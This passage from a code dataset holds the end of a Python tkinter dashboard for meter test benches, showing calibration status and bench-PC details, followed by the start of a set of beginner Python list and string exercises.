570, y=370, width = 250, heigh = 90)\npoverka_CL3005_3 = Label(lbl_CL3005_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_3.place(x=45, y=30)\nCL3005_3_1 = Button(lbl_CL3005_3, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_1.place(x=40, y=0)\nCL3005_3_2 = Button(lbl_CL3005_3, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_2.place(x=135, y=0)\nCL3005_3_ST = Button(lbl_CL3005_3, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_ST.place(x=0, y=0)\nCL3005_3_PC = Button(lbl_CL3005_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC20','3035', '20'), bg = alarm_color[3])\nCL3005_3_PC.place(x=0, y=30)\nHovertip(CL3005_3_1, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_2, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_ST, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_PC, ['Windows 7', 'IP 192.168.0.14'])\n\n#Элементы стенда №21 CL3005-24 SN3036\nalarm_color = button_color('3036', 'PC21')\nlbl_CL3005_4 = LabelFrame(window, text = \"21 CL_3ф\")\nlbl_CL3005_4.place(x = 570, y=460, width = 250, heigh = 90)\npoverka_CL3005_4 = Label(lbl_CL3005_4, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_4.place(x=10, y=10)\nCL3005_4_1 = Button(lbl_CL3005_4, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_1.place(x=0, y=30)\nCL3005_4_2 = Button(lbl_CL3005_4, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_2.place(x=95, y=30)\nCL3005_4_ST = Button(lbl_CL3005_4, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_ST.place(x=190, y=30)\nCL3005_4_PC = Button(lbl_CL3005_4, text=\"ПК\", width = 3, command = lambda: PC_card('PC21','3036', '21'), bg = alarm_color[3])\nCL3005_4_PC.place(x=190, y=0)\nHovertip(CL3005_4_1, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_2, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_ST, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_PC, ['Windows 7', 'IP 192.168.0.13'])\n\n#Элементы стенда №22 CL3005-24 SN3032\nalarm_color = button_color('3032', 'PC22')\nlbl_CL3005_5 = LabelFrame(window, text = \"22 CL_3ф\")\nlbl_CL3005_5.place(x = 500, y=550, width = 250, heigh = 90)\npoverka_CL3005_5 = Label(lbl_CL3005_5, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_5.place(x=45, y=30)\nCL3005_5_1 = Button(lbl_CL3005_5, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_1.place(x=50, y=0)\nCL3005_5_2 = Button(lbl_CL3005_5, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_2.place(x=145, y=0)\nCL3005_5_ST = Button(lbl_CL3005_5, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_ST.place(x=10, y=0)\nCL3005_5_PC = Button(lbl_CL3005_5, text=\"ПК\", width = 3, command = lambda: PC_card('PC22','3032', '22'), bg = alarm_color[3])\nCL3005_5_PC.place(x=10, y=30)\nHovertip(CL3005_5_1, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_2, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_ST, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_PC, ['Windows XP', 'IP 192.168.0.200'])\n\n#Элементы стенда №23 CL1001-24 SN1015\nalarm_color = button_color('1015', 'PC23')\nlbl_CL1001_2 = LabelFrame(window, text = \"23 CL_1ф\")\nlbl_CL1001_2.place(x = 480, y=640, width = 220, heigh = 70)\npoverka_CL1001_2 = Label(lbl_CL1001_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_2.place(x=10, y=25)\nCL1001_3_1 = Button(lbl_CL1001_2, text=\"1-12\", width = 6, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_1.place(x=90, y=0)\nCL1001_3_2 = Button(lbl_CL1001_2, text=\"13-24\", width = 6, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_2.place(x=150, y=0)\nCL1001_3_ST = Button(lbl_CL1001_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_ST.place(x=10, y=0)\nCL1001_3_PC = Button(lbl_CL1001_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC23','1015', '23'), bg = alarm_color[3])\nCL1001_3_PC.place(x=50, y=0)\nHovertip(CL1001_3_1, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_2, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_ST, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_PC, ['Windows 7', 'IP 192.168.0.100'])\n\n#Элементы стенда №24 CL1005-48 SN1012\nalarm_color = button_color('1012', 'PC24')\nlbl_CL1005_1 = LabelFrame(window, text = \"24 CL_1ф\")\nlbl_CL1005_1.place(x = 480, y=710, width = 220, heigh = 70)\npoverka_CL1005_1 = Label(lbl_CL1005_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1005_1.place(x=110, y=-5)\nCL1005_1_1 = Button(lbl_CL1005_1, text=\"1-24\", width = 6, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_1.place(x=110, y=15)\nCL1005_1_2 = Button(lbl_CL1005_1, text=\"13-48\", width = 6, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_2.place(x=10, y=15)\nCL1005_1_ST = Button(lbl_CL1005_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_ST.place(x=170, y=15)\nCL1005_1_PC = Button(lbl_CL1005_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC24','1012', '24'), bg = alarm_color[3])\nCL1005_1_PC.place(x=70, y=15)\nHovertip(CL1005_1_1, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_2, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_ST, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_PC, ['Windows XP', 'IP 192.168.0.245'])\n\n#Элементы стенда №25 CL3005-24 SN3044\nalarm_color = button_color('3044', 'PC25')\nlbl_CL3005_6 = LabelFrame(window, text = \"25 CL_3ф\")\nlbl_CL3005_6.place(x = 820, y=0, width = 250, heigh = 90)\npoverka_CL3005_6 = Label(lbl_CL3005_6, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_6.place(x=45, y=30)\nCL3005_6_1 = Button(lbl_CL3005_6, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_1.place(x=40, y=0)\nCL3005_6_2 = Button(lbl_CL3005_6, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_2.place(x=135, y=0)\nCL3005_6_ST = Button(lbl_CL3005_6, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_ST.place(x=0, y=0)\nCL3005_6_PC = Button(lbl_CL3005_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC25','3044', '25'), bg = alarm_color[3])\nCL3005_6_PC.place(x=0, y=30)\nHovertip(CL3005_6_1, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_2, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_ST, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_PC, ['Windows 7', 'IP 192.168.0.247'])\n\n#Элементы стенда №26 SY8126 SN 704202\nalarm_color = button_color('704202', 'PC26')\nlbl_SY8126_1 = LabelFrame(window, text = \"26 SY_3ф\")\nlbl_SY8126_1.place(x = 970, y=190, width = 250, heigh = 90)\npoverka_SY8126_1 = Label(lbl_SY8126_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_1.place(x=45, y=30)\nSY8126_1_1 = Button(lbl_SY8126_1, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_1.place(x=50, y=0)\nSY8126_1_2 = Button(lbl_SY8126_1, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_2.place(x=145, y=0)\nSY8126_1_ST = Button(lbl_SY8126_1, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_ST.place(x=10, y=0)\nSY8126_1_PC = Button(lbl_SY8126_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC26','704202', '26'), bg = alarm_color[3])\nSY8126_1_PC.place(x=10, y=30)\nHovertip(SY8126_1_1, ['SY8126', ' 704202'])\nHovertip(SY8126_1_2, ['SY8126', ' 704202'])\nHovertip(SY8126_1_ST, ['SY8126', ' 704202'])\nHovertip(SY8126_1_PC, ['Windows XP', 'IP 192.168.0.18'])\n\n#Элементы стенда №27 SY8126 SN704203\nalarm_color = button_color('704203', 'PC27')\nlbl_SY8126_2 = LabelFrame(window, text = \"27 SY_3ф\")\nlbl_SY8126_2.place(x = 970, y=280, width = 250, heigh = 90)\npoverka_SY8126_2 = Label(lbl_SY8126_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_2.place(x=10, y=10)\nSY8126_2_1 = Button(lbl_SY8126_2, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_1.place(x=10, y=30)\nSY8126_2_2 = Button(lbl_SY8126_2, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_2.place(x=105, y=30)\nSY8126_2_ST = Button(lbl_SY8126_2, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_ST.place(x=200, y=30)\nSY8126_2_PC = Button(lbl_SY8126_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC27','704203', '27'), bg = alarm_color[3])\nSY8126_2_PC.place(x=200, y=0)\nHovertip(SY8126_2_1, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_2, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_ST, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_PC, ['Windows XP', 'IP 192.168.0.16'])\n\n#Элементы стенда №28 CL3005 SN3038\nalarm_color = button_color('3038', 'PC28')\nlbl_SY8126_3 = LabelFrame(window, text = \"28 CL_3ф\")\nlbl_SY8126_3.place(x = 970, y=370, width = 250, heigh = 90)\npoverka_SY8126_3 = Label(lbl_SY8126_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_3.place(x=45, y=30)\nSY8126_3_1 = Button(lbl_SY8126_3, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_1.place(x=50, y=0)\nSY8126_3_2 = Button(lbl_SY8126_3, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_2.place(x=145, y=0)\nSY8126_3_ST = Button(lbl_SY8126_3, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_ST.place(x=10, y=0)\nSY8126_3_PC = Button(lbl_SY8126_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC28','3038', '28'), bg = alarm_color[3])\nSY8126_3_PC.place(x=10, y=30)\nHovertip(SY8126_3_1, ['CL30005', ' SN3038'])\nHovertip(SY8126_3_2, ['CL30005', ' SN3038'])\nHovertip(SY8126_3_ST, ['CL30005', ' SN3038'])\nHovertip(SY8126_3_PC, ['Windows XP', 'IP 192.168.0.101'])\n\n#Элементы стенда №29 SY8126 SN704204\nalarm_color = button_color('704204', 'PC29')\nlbl_SY8126_2 = LabelFrame(window, text = \"29 SY_3ф\")\nlbl_SY8126_2.place(x = 970, y=460, width = 250, heigh = 90)\npoverka_SY8126_2 = Label(lbl_SY8126_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_2.place(x=10, y=10)\nSY8126_2_1 = Button(lbl_SY8126_2, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_1.place(x=10, y=30)\nSY8126_2_2 = Button(lbl_SY8126_2, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_2.place(x=105, y=30)\nSY8126_2_ST = Button(lbl_SY8126_2, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_ST.place(x=200, y=30)\nSY8126_2_PC = Button(lbl_SY8126_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC29','704204', '29'), bg = alarm_color[3])\nSY8126_2_PC.place(x=200, y=0)\nHovertip(SY8126_2_1, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_2, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_ST, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_PC, ['Windows 10', 'нет данных'])\n\n#Элементы стенда №30 CL3005-24 SN3030\nalarm_color = button_color('3030', 'PC30')\nlbl_CL3005_7 = LabelFrame(window, text = \"30 CL_3ф\")\nlbl_CL3005_7.place(x = 970, y=550, width = 250, heigh = 90)\npoverka_CL3005_7 = Label(lbl_CL3005_7, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_7.place(x=45, y=30)\nCL3005_7_1 = Button(lbl_CL3005_7, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3030', '30'), bg = alarm_color[0])\nCL3005_7_1.place(x=50, y=0)\nCL3005_7_2 = Button(lbl_CL3005_7, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3030', '30'), bg = alarm_color[0])\nCL3005_7_2.place(x=145, y=0)\nCL3005_7_ST = Button(lbl_CL3005_7, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3030', '30'), bg = alarm_color[0])\nCL3005_7_ST.place(x=10, y=0)\nCL3005_7_PC = Button(lbl_CL3005_7, text=\"ПК\", width = 3, command = lambda: PC_card('PC30','3030', '30'), bg = alarm_color[3])\nCL3005_7_PC.place(x=10, y=30)\nHovertip(CL3005_7_1, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_2, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_ST, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_PC, ['Windows 7', 'IP 192.168.0.180'])\n\n#Элементы стенда №31 CL3005-24 SN3029\nalarm_color = button_color('3029', 'PC31')\nlbl_CL3005_8 = LabelFrame(window, text = \"31 CL_3ф\")\nlbl_CL3005_8.place(x = 970, y=640, width = 250, heigh = 90)\npoverka_CL3005_8 = Label(lbl_CL3005_8, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_8.place(x=10, y=10)\nCL3005_8_1 = Button(lbl_CL3005_8, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_1.place(x=10, y=30)\nCL3005_8_2 = Button(lbl_CL3005_8, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_2.place(x=105, y=30)\nCL3005_8_ST = Button(lbl_CL3005_8, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_ST.place(x=200, y=30)\nCL3005_8_PC = Button(lbl_CL3005_8, text=\"ПК\", width = 3, command = lambda: PC_card('PC31','3029', '31'), bg = alarm_color[3])\nCL3005_8_PC.place(x=200, y=0)\nHovertip(CL3005_8_1, ['CL3005-24', 'SN3029'])\nHovertip(CL3005_8_2, ['CL3005-24', 'SN3029'])\nHovertip(CL3005_8_ST, ['CL3005-24', 'SN3029'])\nHovertip(CL3005_8_PC, ['Windows 7', 'IP 192.168.0.111'])\n\n#Элементы стенда №32 Merkury_210 SN025\nalarm_color = button_color('025', 'PC32')\nlbl_Merkury_210 = LabelFrame(window, text = \"32\")\nlbl_Merkury_210.place(x = 710, y=720, width = 60, heigh = 60)\nMerkury_210 = Button(lbl_Merkury_210, text=\"1-6\", width = 3, command = lambda: installation_card('Merkury_210','025', '32'), bg = alarm_color[0])\nMerkury_210.place(x=10, y=0)\nHovertip(Merkury_210, ['Merkury_210', 'SN025'])\n\n#Элементы стенда №33 Merkury_210 SN018\nalarm_color = button_color('018', 'PC33')\nlbl_Merkury_210 = LabelFrame(window, text = \"33\")\nlbl_Merkury_210.place(x = 780, y=720, width = 60, heigh = 60)\nMerkury_210 = Button(lbl_Merkury_210, text=\"1-6\", width = 3, command = lambda: installation_card('Merkury_210','018', '33'), bg = alarm_color[0])\nMerkury_210.place(x=10, y=0)\nHovertip(Merkury_210, ['Merkury_210', 'SN025'])\n\n#Элементы стенда №34 Functional_3ph SN000001\nalarm_color = button_color('000001', 'PC34')\nlbl_Functional_3ph_1 = LabelFrame(window, text = \"34\")\nlbl_Functional_3ph_1.place(x = 130, y=640, width = 90, heigh = 60)\nFunctional_3ph_1 = Button(lbl_Functional_3ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_3ph', '000001', '34'), bg = alarm_color[0])\nFunctional_3ph_1.place(x=10, y=0)\nFunctional_3ph_PC_1 = Button(lbl_Functional_3ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC34', '000001', '34'), bg = alarm_color[3])\nFunctional_3ph_PC_1.place(x=50, y=00)\nHovertip(Functional_3ph_1, ['Functional_3ph', '000001'])\nHovertip(Functional_3ph_PC_1, ['Windows 7', 'IP 192.168.194.19'])\n\n#Элементы стенда №35 Functional_3ph SN000035\nalarm_color = button_color('000035', 'PC35')\nlbl_Functional_3ph_2 = LabelFrame(window, text = \"35\")\nlbl_Functional_3ph_2.place(x = 20, y=640, width = 90, heigh = 60)\nFunctional_3ph_2 = Button(lbl_Functional_3ph_2, text=\"1\", width = 3, command = lambda: installation_card('Functional_3ph','000035', '35'), bg = alarm_color[0])\nFunctional_3ph_2.place(x=10, y=0)\nFunctional_3ph_PC_2 = Button(lbl_Functional_3ph_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC35','000035', '35'), bg = alarm_color[3])\nFunctional_3ph_PC_2.place(x=50, y=0)\nHovertip(Functional_3ph_2, ['Functional_3ph', '000035'])\nHovertip(Functional_3ph_PC_2, ['Windows 7', 'IP 000.000.000.000'])\n\n#Элементы стенда №36 Functional_1ph SN061101401\nalarm_color = button_color('061101401', 'PC36')\nlbl_Functional_1ph_1 = LabelFrame(window, text = \"36\")\nlbl_Functional_1ph_1.place(x = 130, y=700, width = 90, heigh = 60)\nFunctional_1ph_1 = Button(lbl_Functional_1ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','061101401', '36'), bg = alarm_color[0])\nFunctional_1ph_PC_3 = Button(lbl_Functional_1ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC36','061101401', '36'), bg = alarm_color[3])\nFunctional_1ph_PC_3.place(x=50, y=0)\nFunctional_1ph_1.place(x=10, y=0)\nHovertip(Functional_1ph_1, ['Functional_1ph', '061101401'])\nHovertip(Functional_1ph_PC_3, ['Windows 7', 'IP 0.0.0.0'])\n\n#Элементы стенда №37 Functional_1ph SN000037\nalarm_color = button_color('000037', 'PC37')\nlbl_Functional_1ph_2 = LabelFrame(window, text = \"37\")\nlbl_Functional_1ph_2.place(x = 20, y=700, width = 90, heigh = 60)\nFunctional_1ph_2 = Button(lbl_Functional_1ph_2, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','000037', '37'), bg = alarm_color[0])\nFunctional_1ph_2.place(x=10, y=0)\nFunctional_1ph_2_PC_4 = Button(lbl_Functional_1ph_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC37','000037', '37'), bg = alarm_color[3])\nFunctional_1ph_2_PC_4.place(x=50, y=00)\nHovertip(Functional_1ph_2, ['Functional_1ph', '000037'])\nHovertip(Functional_1ph_2_PC_4, ['Windows 7', 'IP 000.000.000.000'])\n\n#Элементы стенда №38 Functional_1ph SN000038\nalarm_color = button_color('000038', 'PC38')\nlbl_Functional_1ph_1 = LabelFrame(window, text = \"38\")\nlbl_Functional_1ph_1.place(x = 1130, y=730, width = 90, heigh = 60)\nFunctional_1ph_1 = Button(lbl_Functional_1ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','000038', '38'), bg = alarm_color[0])\nFunctional_1ph_PC_3 = Button(lbl_Functional_1ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC38','000038', '38'), bg = alarm_color[3])\nFunctional_1ph_PC_3.place(x=5, y=0)\nFunctional_1ph_1.place(x=45, y=0)\nHovertip(Functional_1ph_1, ['Functional_1ph', '000038'])\nHovertip(Functional_1ph_PC_3, ['Windows XP', 'IP 192.168.0.243'])\n\n\n#Элементы стенда №39 Rele_201TLO SN000039\nalarm_color = button_color('000039', 'PC39')\nlbl_Rele_201TLO = LabelFrame(window, text = \"39, 40\")\nlbl_Rele_201TLO.place(x = 20, y=10, width = 150, heigh = 60)\nRele_201TLO = Button(lbl_Rele_201TLO, text=\"1\", width = 3, command = lambda: installation_card('Rele_201TLO','000039', '39'), bg = alarm_color[0])\nRele_201TLO.place(x=50, y=0)\nRele_201TLO_PC = Button(lbl_Rele_201TLO, text=\"ПК\", width = 3, command = lambda: PC_card('PC39','000039', '39'), bg = alarm_color[3])\nRele_201TLO_PC.place(x=10, y=0)\nHovertip(Rele_201TLO, ['Rele_201TLO', '000039'])\nHovertip(Rele_201TLO_PC, ['Windows XP', 'IP 192.168.0.131'])\n\n#Элементы стенда №40 Modem_PLC_201TLO SN000040\nalarm_color = button_color('000040', 'PC39')\nModem_201TLO = Button(lbl_Rele_201TLO, text=\"1\", width = 3, command = lambda: installation_card('Modem_201TLO','000040', '40'), bg = alarm_color[0])\nModem_201TLO.place(x=90, y=0)\nHovertip(Modem_201TLO, ['Modem_201TLO', '000040'])\n\n#Элементы стенда №41 CL1000 SN1017\nalarm_color = button_color('1017', 'PC41')\nlbl_CL1000 = LabelFrame(window, text = \"41 CL_1ф\")\nlbl_CL1000.place(x = 410, y=500, width = 50, heigh = 180)\npoverka_CL1000 = Label(lbl_CL1000, text = (\"Пов.:\\n\" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1000.place(x=5, y=110)\nCL1000_1 = Button(lbl_CL1000, text=\"1-6\", width = 3, command = lambda: installation_card('CL1000','1017', '41'), bg = alarm_color[0])\nCL1000_1.place(x=5, y=5)\nCL1000_ST = Button(lbl_CL1000, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1000','1017', '41'), bg = alarm_color[0])\nCL1000_ST.place(x=5, y=40)\nCL1000_PC = Button(lbl_CL1000, text=\"ПК\", width = 3, command = lambda: PC_card('PC41','1017', '41'), bg = alarm_color[3])\nCL1000_PC.place(x=5, y=75)\nHovertip(CL1000_1, ['CL1000', '1017'])\nHovertip(CL1000_ST, ['CL1000', '1017'])\nHovertip(CL1000_PC, ['Windows 7', 'IP 192.168.0.207'])\n\n#Элементы стенда №49 SY8126 SN0808169\nalarm_color = button_color('0808169', 'PC49')\nlbl_SY8126_3 = LabelFrame(window, text = \"49 SY_3ф\")\nlbl_SY8126_3.place(x = 1270, y=280, width = 100, heigh = 270)\npoverka_SY8126_3 = Label(lbl_SY8126_3, text = (\"Поверка: \\n\" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_3.place(x=10, y=170)\nprogon_SY8126_3 = Label(lbl_SY8126_3, text = (\"Стенд рядом\\n с прогоном\" ))\nprogon_SY8126_3.place(x=0, y=210)\nSY8126_3_1 = Button(lbl_SY8126_3, text=\"1 \\n-12\", width = 3, height = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_1.place(x=10, y=70)\nSY8126_3_2 = Button(lbl_SY8126_3, text=\"13 \\n-24\", width = 3, height = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_2.place(x=10, y=5)\nSY8126_3_ST = Button(lbl_SY8126_3, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_ST.place(x=10, y=135)\nSY8126_3_PC = Button(lbl_SY8126_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC49','0808169', '49'), bg = alarm_color[3])\nSY8126_3_PC.place(x=45, y=135)\nHovertip(SY8126_3_1, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_2, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_ST, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_PC, ['Windows XP', 'IP 192.168.0.11'])\n\n#Элементы стенда №90 CL3005-24 SN3036\nalarm_color = button_color('3027', 'PC90')\nlbl_CL3005_9 = LabelFrame(window, text = \"90 Ремонт_группа\")\nlbl_CL3005_9.place(x = 1250, y=700, width = 150, heigh = 90)\npoverka_CL3005_9 = Label(lbl_CL3005_9, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_9.place(x=0, y=10)\nCL3005_9_1 = Button(lbl_CL3005_9, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3027', '90'), bg = alarm_color[0])\nCL3005_9_1.place(x=5, y=30)\nCL3005_9_ST = Button(lbl_CL3005_9, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3027', '90'), bg = alarm_color[0])\nCL3005_9_ST.place(x=110, y=30)\nCL3005_9_PC = Button(lbl_CL3005_9, text=\"ПК\", width = 3, command = lambda: PC_card('PC90','3027', '90'), bg = alarm_color[3])\nCL3005_9_PC.place(x=110, y=0)\nHovertip(CL3005_9_1, ['CL3005-24', ' SN3027'])\nHovertip(CL3005_9_ST, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_9_PC, ['Windows 2000', 'IP 0.0.0.0'])\n\nwindow.mainloop()\n\n\n","sub_path":"journal/journal01.py","file_name":"journal01.py","file_ext":"py","file_size_in_byte":63670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106477129","text":"'''1. Function\nGiven three numbers a, b (a ≤ b) and step. Create an list of evenly spaced elements starting from a to b spaced by step. you have 3 argument:\nInput Output\n1 5 1 [1, 2, 3, 4, 5]\n10 100 20 [10, 30, 50, 70, 90]'''\nu = []\nx = int(input('Start: '))\ny = int(input('End: '))\nz = int(input('Step: '))\nif x > y and z == abs(z):\n\tprint('Wrong numbers')\nelif x < y and z != abs(z):\n\tprint('Wrong numbers')\nelse:\n\tfor i in range(x,y,z):\n\t\tu.append(i)\n\tprint(u)\n\n\n'''2. List\nWrite a function. Create the list which elements are products between two neighbours.\nInput Output\n[3, 7, 12, 5, 20, 0] [21, 84, 60, 100, 0] [1, 1, 4, 32, 6] [1, 4, 128, 192 ]'''\nz = []\nx = [3, 7, 12, 5, 20, 0]\nfor i in range(len(x)-1):\n\tres = x[i] * x[i + 1]\n\tz.append(res)\nprint(z)\n\n\n'''3. New sentence\nGiven a sentence with missing words and an array of words. Replace all ‘_’ in a sentence with the words from the array.\nInput “_, we have a _.”\n[“Ashot”, “problem”]\nOutput: “Ashot, we have a problem.'''\na = ['Ashot', 'problem']\ncount = 0\nu = []\n\nz = '_, we have a _.'\nfor i in z:\n\tif i == '_':\n\t\tu.append(a[count])\n\t\tcount += 1 \n\telse:\n\t\tu.append(i)\nprint(''.join(u))\n\n\n'''4. sum word\nGiven a list of strings. Find the strings with maximum and minimum lengths in array. Print the sum of their lengths.\nInput: [“anymore”, “raven”, “me”, “communicate”] Output: 13'''\n\nx = ['anymore', 'raven', 'me', 'communicate']\ncount_max = 0\ncount_min = 0\nfor i in x:\n\tif len(i) > count_max:\n\t\tcount_max = len(i)\n\t\tcount_min = len(i)\nfor i in x:\n\tif count_min > len(i):\n\t\tcount_min = len(i)\nres = count_min + count_max\nprint(res)\n\n\n\n'''5. find index\nGiven a list of numbers and a number. Find the index of a first element which is equal to that number. If there is not such a number, that find the index of the first element which is the closest to it. Input Output\n[21, -9, 15, 2116, -71, 33], -71 4\n[ 36, -12, 47, -58, 148, -55, -19, 10], -56 6'''\nu = []\nx = [21, -9, 15, 2116, -71, 33]\ny = int(input('Number: '))\nif y in x:\n\tz = x.index(y)\n\tprint(z)\nelse:\n\tfor i in x:\n\t\tu.append(abs(i - y))\na = u.index(min(u))\nl = x[a]\nprint(l)\n\n\n'''6. New Dict\nDefine a function which can generate a 